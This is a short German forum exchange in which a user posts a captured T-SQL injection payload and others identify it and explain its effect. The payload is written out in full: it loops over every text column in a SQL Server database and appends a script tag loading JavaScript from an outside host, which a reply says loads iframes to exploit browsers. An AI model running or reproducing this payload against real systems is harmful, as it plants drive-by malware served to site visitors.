nicht angemeldet
Moin Moin!
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] cet ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--/'+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Sieht für mich auf dem ersten Blick aus wie Microsofts T-SQL für den SQL-Server. Yuck!
Die JS-URL mag FF nicht, "Reported Attack Site". Im JS werden diverse IFrames nachgeladen und irgendwelche Cookies gebastelt, vermutlich um Browser-Fehler auszunutzen.
Alexander
Today I will gladly share my knowledge and experience, for there are no sweeter words than "I told you so".
Der Martin